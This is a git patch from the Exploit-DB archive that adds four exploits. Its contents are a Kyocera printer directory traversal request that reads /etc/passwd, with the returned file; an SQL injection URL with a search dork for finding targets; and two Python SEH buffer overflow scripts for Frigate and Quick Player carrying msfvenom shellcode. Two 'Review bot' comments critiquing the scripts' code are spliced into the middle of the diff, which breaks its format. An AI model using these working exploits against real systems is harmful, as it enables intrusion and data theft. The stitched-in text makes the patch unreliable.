From 590364ca2a0a3e3251b312f456260d3781fc13db Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 Jun 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-06-09 4 changes to exploits/shellcodes Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection --- exploits/hardware/webapps/48561.txt | 68 ++++++++++++++++++++++ exploits/php/webapps/48562.txt | 23 ++++++++ exploits/windows/local/48563.py | 70 ++++++++++++++++++++++ exploits/windows/local/48564.py | 90 +++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 255 insertions(+) create mode 100644 exploits/hardware/webapps/48561.txt create mode 100644 exploits/php/webapps/48562.txt create mode 100755 exploits/windows/local/48563.py create mode 100755 exploits/windows/local/48564.py diff --git a/exploits/hardware/webapps/48561.txt b/exploits/hardware/webapps/48561.txt new file mode 100644 index 000000000..b053e1597 --- /dev/null +++ b/exploits/hardware/webapps/48561.txt 
@@ -0,0 +1,68 @@
+# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)
+# Exploit Author: Hakan Eren ŞAN
+# Date: 2020-06-06
+# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html
+# Version: d-COPIA253MF plus
+# Tested on : Linux
+# Credit: Berat Isler
+
+
+# First step , you can capture the main page
+# Then create a directory traveral payload like ../../../ this
+# Then you add nullbyte to the end of the payload(%00)
+# Last step sent your request
+
+This is the code :
+
+Request:
+
+
+GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1
+Host: X.X.X.X
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
+Gecko/20100101 Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: rtl=0
+Upgrade-Insecure-Requests: 1
+If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT"
+Cache-Control: max-age=0
+
+
+Response:
+
+HTTP/1.1 200 OK
+Content-Length: 843
+Date: Thu, 04 Jun 2020 16:09:54 GMT
+Server: KM-MFP-http/V0.0.1
+Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT
+ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun
+2020 13:41:16 GMT"
+Content-Type: text/html
+
+root::0:0:root:/root:/bin/sh
+bin:*:1:1:bin:/bin:/bin/sh
+daemon:*:2:2:daemon:/usr/sbin:/bin/sh
+sys:*:3:3:sys:/dev:/bin/sh
+adm:*:4:4:adm:/var/adm:/bin/sh
+lp:*:5:7:lp:/var/spool/lpd:/bin/sh
+sync:*:6:8:sync:/bin:/bin/sync
+shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
+halt:*:8:10:halt:/sbin:/sbin/halt
+mail:*:9:11:mail:/var/mail:/bin/sh
+news:*:10:12:news:/var/spool/news:/bin/sh
+uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh
+operator:*:12:0:operator:/root:/bin/sh
+games:*:13:60:games:/usr/games:/bin/sh
+ftp:*:15:14:ftp:/var/ftp:/bin/sh
+man:*:16:20:man:/var/cache/man:/bin/sh
+www:*:17:18:www-data:/var/www:/bin/sh
+sshd:*:18:19:sshd:/var/run/sshd:/bin/sh
+proxy:*:19:21:proxy:/bin:/bin/sh
+telnetd:*:20:22:proxy:/bin:/bin/sh
+backup:*:34:34:backup:/var/backups:/bin/sh
+ais:*:101:101:ais:/var/run/ais:/bin/sh
+nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
\ No newline at end of file
diff --git a/exploits/php/webapps/48562.txt b/exploits/php/webapps/48562.txt
new file mode 100644
index 000000000..10c1394f9
--- /dev/null
+++ b/exploits/php/webapps/48562.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
+# Date: 2020-06-07
+# Exploit Author: Pankaj Kumar Thakur
+# Vendor Homepage: http://virtualairlinesmanager.net/
+# Dork: inurl:notam_id=
+# Affected Version: 2.6.2
+# Tested on: Ubuntu
+# CVE : N/A
+
+Vulnerable parameter
+-------------------
+notam_id=%27%27
+
+Id parameter's value is going into sql query directly!
+
+Proof of concept
+---------------
+https://localhost:8080/vam/index.php?page=notam¬am_id=11%27%27
+
+
+Submitted: Jun 1 2020
+Fixed: Jun 5 2020
+Acknowledgement : https://ibb.co/Y3WYdFN
\ No newline at end of file
diff --git a/exploits/windows/local/48563.py b/exploits/windows/local/48563.py
new file mode 100755
index 000000000..4aad4c2a0
--- /dev/null
+++ b/exploits/windows/local/48563.py
@@ -0,0 +1,70 @@ +# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-07 +# Vulnerable Software: Frigate +# Version: <= 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Command" > "Command Line" > "Activate Command Line" +# 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application. +# 7.- Press Enter from Keyboard. +# 7.- Click on OK in the dialog box that appears. +# 8.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf 
+= "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/exploits/windows/local/48564.py b/exploits/windows/local/48564.py new file mode 100755 index 000000000..14c4c2602 --- /dev/null +++ b/exploits/windows/local/48564.py 
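Review bot: The last line of 48563.py, `f.close`, only references the bound method and never calls it, so the file handle is never explicitly closed and the output is flushed only at interpreter exit; it should be `f.close()`, or the open/write/close trio replaced with `with open("FrigateLCE.txt", "w") as f: f.write(payload)`. The script is also Python 2 only as written: the `\x..` escapes live in `str` literals and the file is opened in text mode `"w"`, which under Python 3 would transcode anything above 0x7f rather than write the intended bytes — the header should state `# Python 2`, and the same applies to 48564.py in this commit. Two minor header inconsistencies: the step list numbers two consecutive steps as `7.-`, and `Discovery Date: 2020-06-07` disagrees with the 2020-06-08 date this commit records for the same entry in files_exploits.csv.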
@@ -0,0 +1,90 @@ +# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) +# Date: 2020-06-05 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html +# Version: 1.3 +# Tested on: Windows 7 + +# Proof of Concept: + +# 1.- Run the python script "poc.py", it will create a new file "poc.m3l" +# 2.- Open the application, +# 3.- Click on the bottom-right button with the letters "PL" +# 4.- Select the option "File" +# 5.- Click "Load List" +# 6.- Select poc.m3l +# 7.- Profit + +# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/ +# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif + +# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX +# Payload size: 640 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b" +buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47" +buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51" +buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d" +buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50" +buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a" +buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30" +buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d" +buf += 
b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a" +buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a" +buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44" +buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69" +buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67" +buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59" +buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51" +buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62" +buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51" +buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52" +buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42" +buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79" +buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32" +buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71" +buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50" +buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59" +buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38" +buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50" +buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45" +buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a" +buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64" +buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e" +buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48" +buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71" +buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35" +buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e" +buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39" +buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61" +buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39" +buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e" +buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f" +buf += 
b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c" +buf += b"\x48\x41\x41" + +alignment = "\x54\x71" # push esp, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe) + +buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1cf93bd8b..1a7e1ec38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
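Review bot: In 48564.py, `buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200` concatenates `str` pieces with `buf`, which is built from `b"..."` literals; under Python 3 that raises TypeError before `open` is reached, so the mixed literal types make the interpreter requirement implicit — either document `# Python 2 only` in the header or keep every piece one type. `f = open ("poc.m3l", "w")` followed by explicit `f.close()` is also better written as `with open("poc.m3l", "w") as f: f.write(buffer)`, and the space before the call parenthesis is non-PEP 8.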
@@ -11085,6 +11085,8 @@ id,file,description,date,author,type,platform,port 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows, 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, +48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows, +48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42787,3 +42789,5 @@ id,file,description,date,author,type,platform,port 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, 48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php, 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, +48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware, +48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,